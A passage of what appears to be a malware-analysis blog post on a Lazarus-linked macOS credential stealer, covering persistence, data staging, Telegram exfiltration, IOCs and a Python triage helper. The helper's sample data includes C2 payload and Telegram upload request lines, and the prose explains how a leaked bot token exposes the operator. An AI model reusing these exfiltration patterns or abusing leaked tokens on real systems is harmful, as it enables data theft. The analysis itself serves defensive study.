https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/J-1-1536x906.png 1536w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/J-1-2048x1207.png 2048w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/J-1-370x218.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/J-1-270x159.png 270w, 
https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/J-1-740x436.png 740w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><figcaption class=\"wp-element-caption\"><em>A Bash service is created for persistence<\/em>&nbsp;<\/figcaption><\/figure><\/div>\n\n\n<p>To achieve this, it creates a folder called \u201cAntivirus Service\u201d,&nbsp;where it stores this binary, and sets up a&nbsp;LaunchAgent, the macOS equivalent of a Windows Service, to execute it at startup. From that point on, it re-invokes the malware kit at every login.&nbsp;<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"650\" src=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/K-1-1024x650.png\" alt=\"\" class=\"wp-image-20222\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/K-1-1024x650.png 1024w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/K-1-300x191.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/K-1-768x488.png 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/K-1-1536x975.png 1536w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/K-1-2048x1301.png 2048w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/K-1-370x235.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/K-1-270x171.png 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/K-1-740x470.png 740w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><figcaption class=\"wp-element-caption\"><em>The&nbsp;LaunchAgent<\/em>&nbsp;<\/figcaption><\/figure><\/div>\n\n\n<p>Moving on to the final stage, this script cleans up by&nbsp;deleting&nbsp;all ZIP files and downloaded fake applications (*.app) from the temporary directory. 
The parent process then&nbsp;proceeds&nbsp;to download the final binary in the kit: macrasv2.&nbsp;<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">The Stealer&nbsp;<\/h2>\n\n\n\n<p>Obtained from the same \/payload endpoint, macrasv2 is the final stealer and the main&nbsp;component&nbsp;of the chain.&nbsp;&nbsp;<\/p>\n\n\n\n<p><a href=\"https:\/\/app.any.run\/tasks\/94b9bc1f-86ff-4069-8222-1cb511d78ad9\/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=lazarus-apt-macos-campaign&amp;utm_term=210426&amp;utm_content=linktoservice\" target=\"_blank\" rel=\"noreferrer noopener\">See sandbox analysis of macrasv2<\/a>&nbsp;<\/p>\n\n\n\n<p>It stages all previously collected data, including, but not limited to, browser extension data, stored browser&nbsp;credentials&nbsp;and cookies (typically kept in SQLite databases), macOS Keychain entries, and other files of interest,&nbsp;consolidating&nbsp;them into a temporary directory. Since this is an empty laboratory, the number of staged files is&nbsp;relatively small.&nbsp;<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"619\" src=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/L-1-1024x619.png\" alt=\"\" class=\"wp-image-20224\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/L-1-1024x619.png 1024w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/L-1-300x181.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/L-1-768x464.png 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/L-1-1536x929.png 1536w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/L-1-2048x1238.png 2048w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/L-1-370x224.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/L-1-270x163.png 270w, 
https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/L-1-740x447.png 740w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><figcaption class=\"wp-element-caption\"><em>Final staging directory<\/em>&nbsp;<\/figcaption><\/figure><\/div>\n\n\n<p>From there, the data is archived into a file named user_ext.zip, preparing it for exfiltration.&nbsp;<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"616\" src=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/M-1-1024x616.png\" alt=\"\" class=\"wp-image-20226\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/M-1-1024x616.png 1024w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/M-1-300x181.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/M-1-768x462.png 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/M-1-1536x924.png 1536w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/M-1-2048x1232.png 2048w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/M-1-370x223.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/M-1-270x162.png 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/M-1-740x445.png 740w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><figcaption class=\"wp-element-caption\"><em>ZIP file ready to be exfiltrated<\/em>&nbsp;<\/figcaption><\/figure><\/div>\n\n\n<p>Exfiltration is carried out through a familiar channel, Telegram. In this case, however, the operators exposed their bot token, effectively allowing third parties to interact with the bot. 
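<\/p>\n\n\n\n<p>As an added example (not code from the original analysis or from the malware kit), the following Python helper shows what a leaked token hands to a third party and how to pull the token and the recipient chat out of a sample or a capture: it extracts Bot API tokens from a strings dump, builds the getMe and getUpdates calls an analyst would issue, lists the chats seen in a getUpdates reply, and classifies request lines by the Go-http-client User-Agent on ports 8888 and 9999 and by uploads to api.telegram.org (traits described under Additional Observations below). The token, chat ID, request lines and API reply are all constructed, and the token shape (numeric bot ID, colon, 35-character secret) is an assumption about the Bot API format rather than something taken from the sample.<\/p>

```python
# Added example: not code from the original analysis or from the malware kit.
# Triage helpers for the Telegram exfiltration channel and the Go-based C2
# traffic described in the article. Every sample value below is constructed.
import json
import re
from urllib.parse import parse_qs, urlparse

TELEGRAM_API = 'https://api.telegram.org'
C2_PORTS = {8888, 9999}  # ports the kit was observed talking to
# Assumed Bot API token shape: numeric bot id, colon, 35-character secret.
TOKEN_RE = re.compile('(?<![0-9])([0-9]{8,10}:[A-Za-z0-9_-]{35})(?![A-Za-z0-9_-])')


def find_bot_tokens(text):
    '''Distinct bot tokens found in a strings dump or a decoded capture.'''
    found = []
    for m in TOKEN_RE.finditer(text):
        if m.group(1) not in found:
            found.append(m.group(1))
    return found


def bot_api_urls(token):
    '''The calls a leaked token unlocks: the bot identity and its inbound messages.'''
    base = TELEGRAM_API + '/bot' + token
    return {'getMe': base + '/getMe', 'getUpdates': base + '/getUpdates'}


def chats_from_updates(reply_json):
    '''Map chat id -> username or title for every chat in a getUpdates reply;
    the chats that talk to the bot are where the operator sits.'''
    chats = {}
    for upd in json.loads(reply_json).get('result', []):
        msg = upd.get('message') or upd.get('channel_post') or {}
        chat = msg.get('chat', {})
        if 'id' in chat:
            chats[chat['id']] = chat.get('username') or chat.get('title') or ''
    return chats


def classify_request(line):
    '''Classify one request line in the constructed format METHOD URL USER-AGENT.
    Returns a list of (finding, detail, detail) tuples; empty means nothing seen.'''
    method, url, user_agent = line.split(' ', 2)
    u = urlparse(url)
    findings = []
    if u.hostname == 'api.telegram.org' and u.path.startswith('/bot'):
        token = u.path[len('/bot'):].split('/', 1)[0]
        chat_id = parse_qs(u.query).get('chat_id', [''])[0]
        findings.append(('telegram_bot_api', token, chat_id))
    if u.port in C2_PORTS and user_agent.startswith('Go-http-client'):
        findings.append(('go_client_c2', u.hostname, u.port))
    return findings


# Constructed samples (not real captures): a fragment of strings output,
# a Bot API getUpdates reply, and three request lines.
SAMPLE_STRINGS = ('sendDocument https://api.telegram.org/bot1234567890:'
                  'AAHabcdefghijklmnopqrstuvwxyz012345/sendDocument user_ext.zip')
SAMPLE_UPDATES = json.dumps({'ok': True, 'result': [{'update_id': 1, 'message': {
    'message_id': 7, 'from': {'id': 555000111, 'username': 'operator_handle'},
    'chat': {'id': 555000111, 'type': 'private', 'username': 'operator_handle'},
    'text': '/start'}}]})
SAMPLE_REQUESTS = [
    'GET http://172.86.113.102:8888/payload Go-http-client/1.1',
    'POST https://api.telegram.org/bot1234567890:AAHabcdefghijklmnopqrstuvwxyz012345'
    '/sendDocument?chat_id=555000111 Go-http-client/1.1',
    'GET https://www.example.com/ Mozilla/5.0',
]


def triage(strings_text, updates_json, request_lines):
    '''Tie it together: tokens, the calls they unlock, chats, and per-line hits.'''
    tokens = find_bot_tokens(strings_text)
    return {
        'tokens': tokens,
        'api_urls': {t: bot_api_urls(t) for t in tokens},
        'chats': chats_from_updates(updates_json),
        'hits': [(line, classify_request(line)) for line in request_lines],
    }


if __name__ == '__main__':
    print(json.dumps(triage(SAMPLE_STRINGS, SAMPLE_UPDATES, SAMPLE_REQUESTS), indent=2))
```

<p>The helper never contacts Telegram itself: it only produces the URLs and parses a reply you already hold, which keeps the decision to query a live bot (a legal and attribution question, not a technical one) with the analyst. Feed classify_request from your proxy or Zeek HTTP logs after mapping them to the METHOD URL USER-AGENT shape, and treat a Go-http-client User-Agent on a non-standard port as a hunting lead rather than a verdict, since plenty of legitimate Go tooling carries the same string.<\/p>\n\n\n\n<p>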
This not only weakens their operational security but also simplifies reporting and potential takedown efforts.&nbsp;<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"618\" src=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/N-1-1024x618.png\" alt=\"\" class=\"wp-image-20228\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/N-1-1024x618.png 1024w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/N-1-300x181.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/N-1-768x464.png 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/N-1-1536x928.png 1536w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/N-1-2048x1237.png 2048w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/N-1-370x223.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/N-1-270x163.png 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/N-1-740x447.png 740w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><figcaption class=\"wp-element-caption\"><em>Telegram Bot\/API Key is leaked<\/em><\/figcaption><\/figure><\/div>\n\n\n<p>This makes it trivial to read the bot\u2019s messages, send messages on its behalf, and even&nbsp;identify&nbsp;its owner: anyone holding the token can call the Bot API directly, where getMe returns the bot\u2019s identity, getUpdates lists the chats and messages it has received, and sendMessage or sendDocument post in its name. The chat that receives the stolen archives is also visible in the upload requests the malware makes, so the operator\u2019s chat ID, and with it the account behind it, surfaces from the same token. Defenders should treat a recovered token as reportable to Telegram and as an attribution pivot rather than as a channel to interact with on their own initiative.&nbsp;<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"805\" src=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/Z-1-1024x805.png\" alt=\"\" class=\"wp-image-20232\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/Z-1-1024x805.png 1024w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/Z-1-300x236.png 300w, 
https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/Z-1-768x604.png 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/Z-1-1536x1207.png 1536w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/Z-1-2048x1610.png 2048w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/Z-1-370x291.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/Z-1-270x212.png 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/Z-1-740x582.png 740w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><figcaption class=\"wp-element-caption\"><em>Operator&nbsp;identified&nbsp;via leaked Bot Key<\/em>&nbsp;<\/figcaption><\/figure><\/div>\n\n\n<p>Finally, the malware invokes a self-deletion script named delete_self.sh, which simply removes itself and other components using the system\u2019s rm command.&nbsp;<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"618\" src=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/O-1-1024x618.png\" alt=\"\" class=\"wp-image-20234\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/O-1-1024x618.png 1024w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/O-1-300x181.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/O-1-768x464.png 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/O-1-1536x928.png 1536w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/O-1-2048x1237.png 2048w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/O-1-370x223.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/O-1-270x163.png 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/O-1-740x447.png 740w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" 
\/><figcaption class=\"wp-element-caption\"><em>Self-deletion routine<\/em>&nbsp;<\/figcaption><\/figure><\/div>\n\n\n<p>With this, the full infection cycle is complete. Thanks to ANY.RUN\u2019s macOS analysis capabilities, we were able to fully reconstruct it in record time. It is worth noting that this is a novel (previously unseen) malware, which would typically require significantly more time to disassemble and analyze using traditional methods.&nbsp;<\/p>\n\n\n\n<p>Let\u2019s&nbsp;now move on to the ATT&amp;CK Matrix, followed by the IOCs and other interesting details.&nbsp;<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Additional Observations&nbsp;<\/h2>\n\n\n\n<ul class=\"wp-block-list\">\n<li>The malware is badly written, with certain components entering infinite loops that may expose its presence due to system resource starvation.&nbsp;&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Operational security weaknesses were&nbsp;identified, such as exposed Telegram bot tokens and C2 endpoints with missing authentication.&nbsp;&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>The use of ad-hoc code signing&nbsp;indicates&nbsp;an attempt to bypass macOS execution controls without valid developer credentials.&nbsp;&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Network traffic analysis shows that the malware primarily communicates over ports 8888 and 9999. 
Additionally, HTTP requests consistently use a User-Agent string associated with the Go programming language (e.g., Go-http-client), which aligns with other observed components of the toolset.&nbsp;&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>The&nbsp;adversary\u2019s&nbsp;infrastructure exposed multiple services, including&nbsp;WinRM, Chrome Remote Desktop, Remote Desktop Protocol (RDP), and a replica of the C2 server running on port 110.&nbsp;&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Reverse engineering analysis&nbsp;indicates&nbsp;that multiple components of the malware are written in Go. This is supported by the presence of Go-specific strings and referenced artifacts within the binaries, including characteristic function naming conventions, runtime structures, and the use of the standard Go HTTP client in network communications.&nbsp;&nbsp;<\/li>\n<\/ul>\n\n\n\n<h2 class=\"wp-block-heading\">Defending Against Lazarus Attacks:&nbsp;How&nbsp;CISOs&nbsp;Can Minimize Risk&nbsp;<\/h2>\n\n\n\n<p>Trust-abuse phishing, exemplified by campaigns like&nbsp;<strong>Mach-O Man<\/strong>, exploits legitimate platforms to bypass conventional security measures. Attackers manipulate human psychology with urgent meeting requests or fake technical issues, tricking users into executing malicious commands or&nbsp;disclosing&nbsp;credentials.&nbsp;&nbsp;<\/p>\n\n\n\n<p>For SOC teams, the difficulty lies in detecting these attacks early, as they often slip past signature-based defenses by&nbsp;leveraging&nbsp;trusted services and user-driven actions.&nbsp;<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">Close Detection Gaps with&nbsp;Stronger&nbsp;Cross-Platform&nbsp;Triage&nbsp;<\/h3>\n\n\n\n<p>To combat these threats, SOCs must adopt&nbsp;<strong>interactive sandboxing<\/strong>&nbsp;as a cornerstone of their triage process. 
Unlike automated solutions,&nbsp;<a href=\"https:\/\/any.run\/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=lazarus-apt-macos-campaign&amp;utm_term=210426&amp;utm_content=linktolanding\" target=\"_blank\" rel=\"noreferrer noopener\"><strong>ANY.RUN<\/strong><\/a><strong>&nbsp;eliminates&nbsp;critical&nbsp;blind spots&nbsp;for security teams&nbsp;<\/strong>by enabling analysis of malicious files and URLs across&nbsp;<strong>Windows, macOS, Linux, and Android<\/strong>&nbsp;in a single interface.&nbsp;&nbsp;<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"643\" src=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/frame_generic_light-3-2-1024x643.png\" alt=\"\" class=\"wp-image-20267\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/frame_generic_light-3-2-1024x643.png 1024w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/frame_generic_light-3-2-300x188.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/frame_generic_light-3-2-768x482.png 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/frame_generic_light-3-2-1536x964.png 1536w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/frame_generic_light-3-2-370x232.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/frame_generic_light-3-2-270x170.png 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/frame_generic_light-3-2-740x465.png 740w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/frame_generic_light-3-2.png 1943w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><figcaption class=\"wp-element-caption\"><em>ANY.RUN\u2019s sandbox delivers fast verdicts on malicious files and URLs<\/em><\/figcaption><\/figure><\/div>\n\n\n<p>Instead of juggling separate solutions for each OS, 
SOC teams gain a&nbsp;<strong>unified sandbox environment<\/strong>&nbsp;where they can manually simulate user interactions, uncover hidden attack stages, and capture behavioral IOCs,&nbsp;such as unusual&nbsp;sysctl&nbsp;queries in macOS or Mach-O binary execution.&nbsp;&nbsp;<\/p>\n\n\n\n<p>For business processes, this means&nbsp;<strong>streamlined triage,&nbsp;<\/strong>reducing analysis&nbsp;time&nbsp;and&nbsp;<a href=\"https:\/\/any.run\/integrations\/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=lazarus-apt-macos-campaign&amp;utm_term=210426&amp;utm_content=linktointegrations\" target=\"_blank\" rel=\"noreferrer noopener\">integrating seamlessly<\/a>&nbsp;with SIEM\/SOAR for automated threat&nbsp;investigations.&nbsp;&nbsp;<\/p>\n\n\n\n<p>ANY.RUN delivers&nbsp;<strong>full attack context<\/strong>&nbsp;(process chains, network connections, system changes), which&nbsp;is especially critical for companies with&nbsp;<strong>hybrid infrastructures<\/strong>&nbsp;(corporate Windows, macOS for developers\/designers, Linux servers, and employee Android devices), where traditional sandboxes cover only part of the risk.&nbsp;<\/p>\n\n\n\n<p>When integrated into your SOC workflows, ANY.RUN\u2019s Sandbox delivers measurable impact, enabling security teams to:&nbsp;<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>Identify&nbsp;Credential Exposure Earlier:<\/strong>&nbsp;Detect threats in under 60 seconds and reduce breach probability before escalation begins&nbsp;&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>Reduce MTTR:<\/strong>&nbsp;Achieve up to 21 minutes faster response time and 50% quicker IOC extraction&nbsp;&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>Detect More Relevant Threats:<\/strong>&nbsp;Identify&nbsp;up to 58% more threats with real-time, sandbox-verified 
intelligence&nbsp;&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>Minimize High-Severity Incidents:<\/strong>&nbsp;Earlier detection lowers escalation rates and limits impact on business operations&nbsp;&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>Improve SOC Efficiency Without Hiring:<\/strong>&nbsp;Increase team performance up to 3x and reduce Tier 1 workload by 20%&nbsp;<\/li>\n<\/ul>\n\n\n\n<p>&nbsp;<br>For businesses, this means&nbsp;<strong>fewer breaches, lower&nbsp;financial impact&nbsp;per incident, and more predictable security outcomes<\/strong>. Organizations gain control over both&nbsp;risk&nbsp;exposure and operational costs, rather than reacting after damage occurs.&nbsp;<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">About ANY.RUN&nbsp;<\/h2>\n\n\n\n<p><a href=\"https:\/\/any.run\/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=lazarus-apt-macos-campaign&amp;utm_term=210426&amp;utm_content=linktolanding\" target=\"_blank\" rel=\"noreferrer noopener\">ANY.RUN<\/a>&nbsp;helps&nbsp;over 15,000&nbsp;organizations&nbsp;and 600,000 security professionals&nbsp;identify&nbsp;and understand threats before they turn into incidents.&nbsp;<\/p>\n\n\n\n<p>The solutions combine&nbsp;<a href=\"https:\/\/any.run\/features\/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=lazarus-apt-macos-campaign&amp;utm_term=210426&amp;utm_content=linktosandboxlanding\" target=\"_blank\" rel=\"noreferrer noopener\">interactive sandbox<\/a>&nbsp;analysis and real-time&nbsp;<a href=\"https:\/\/any.run\/threat-intelligence-lookup\/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=lazarus-apt-macos-campaign&amp;utm_term=210426&amp;utm_content=linktolookuplanding\" target=\"_blank\" rel=\"noreferrer noopener\">threat intelligence<\/a>&nbsp;into a single workflow, allowing SOC teams to analyze files and URLs,&nbsp;observe&nbsp;full attack behavior, and make faster, more&nbsp;accurate&nbsp;decisions. 
Instead of relying on delayed indicators or assumptions, analysts see what the threat&nbsp;actually does&nbsp;and what risk it creates for the business.&nbsp;<\/p>\n\n\n\n<p>By strengthening monitoring, triage, and response, ANY.RUN enables organizations to detect more threats earlier, reduce response time, and limit the impact of credential theft, data exposure, and account compromise.&nbsp;<\/p>\n\n\n\n<p>The result is a more predictable and efficient SOC, where decisions are made faster, incidents are&nbsp;contained&nbsp;earlier, and business risk is reduced.&nbsp;<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">IOCs and TTPs&nbsp;<\/h2>\n\n\n\n<h3 class=\"wp-block-heading\">Network IOCs&nbsp;<\/h3>\n\n\n\n<p><strong>IP Addresses<\/strong>&nbsp;<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>172[.]86[.]113[.]102&nbsp;&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>144[.]172[.]114[.]220&nbsp;&nbsp;<\/li>\n<\/ul>\n\n\n\n<p><strong>Domains<\/strong>&nbsp;<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>update-teams[.]live&nbsp;&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>livemicrosft[.]com&nbsp;&nbsp;<\/li>\n<\/ul>\n\n\n\n<p><strong>URLs<\/strong>&nbsp;<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>h[tt]p:\/\/172[.]86[.]113[.]102\/Onedrive&nbsp;&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>h[tt]ps:\/\/update-teams[.]live\/teams&nbsp;&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>h[tt]p:\/\/172[.]86[.]113[.]102\/localencode&nbsp;&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>livemicrosft[.]com\/meet\/89035563931?p=9jXK14VFM8fObdKxfkake8tD7rPhzs.1&nbsp;&nbsp;<\/li>\n<\/ul>\n\n\n\n<h3 class=\"wp-block-heading\">File-based IOCs&nbsp;<\/h3>\n\n\n\n<p><strong>File Names<\/strong>&nbsp;<\/p>\n\n\n\n<div class=\"wp-block-group\"><div class=\"wp-block-group__inner-container is-layout-grid wp-container-core-group-is-layout-1 wp-block-group-is-layout-grid\">\n<ul 
class=\"wp-block-list\">\n<li>localencode&nbsp;&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>OneDrive&nbsp;&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>teamsSDK.bin&nbsp;&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>D1YrHRTg.bin&nbsp;&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>D1yCPUyk.bin&nbsp;&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>minst2.bin&nbsp;&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>macrasv2&nbsp;&nbsp;<\/li>\n<\/ul>\n<\/div><\/div>\n\n\n\n<p><strong>File Paths<\/strong>&nbsp;<\/p>\n\n\n\n<div class=\"wp-block-group\"><div class=\"wp-block-group__inner-container is-layout-grid wp-container-core-group-is-layout-2 wp-block-group-is-layout-grid\">\n<ul class=\"wp-block-list\">\n<li>\/Users\/$USER\/.local\/bin\/OneDrive&nbsp;&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>~\/Library\/.initialized&nbsp;&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>~\/Library\/LaunchAgents\/com.onedrive.launcher.plist&nbsp;&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>~\/Library\/LaunchAgents\/com.onedrive.launcher.tmp&nbsp;&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>$TMPDIR\/OneDrive&nbsp;&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>$TMPDIR\/geniex_client_sleep_state&nbsp;&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>bin.config&nbsp;&nbsp;<\/li>\n<\/ul>\n<\/div><\/div>\n\n\n\n<p><strong>File Hashes (SHA256)<\/strong>&nbsp;<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>eb3eae776d175f7fb2fb9986c89154102ba8eabfde10a155af4dfb18f28be1b5 (com.onedrive.launcher.plist)&nbsp;&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>eb3eae776d175f7fb2fb9986c89154102ba8eabfde10a155af4dfb18f28be1b5 (com.onedrive.launcher.tmp)&nbsp;&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>0f41fd82cac71e27c36eb90c0bf305d6006b4f3d59e8ba55faeacbe62aadef90 
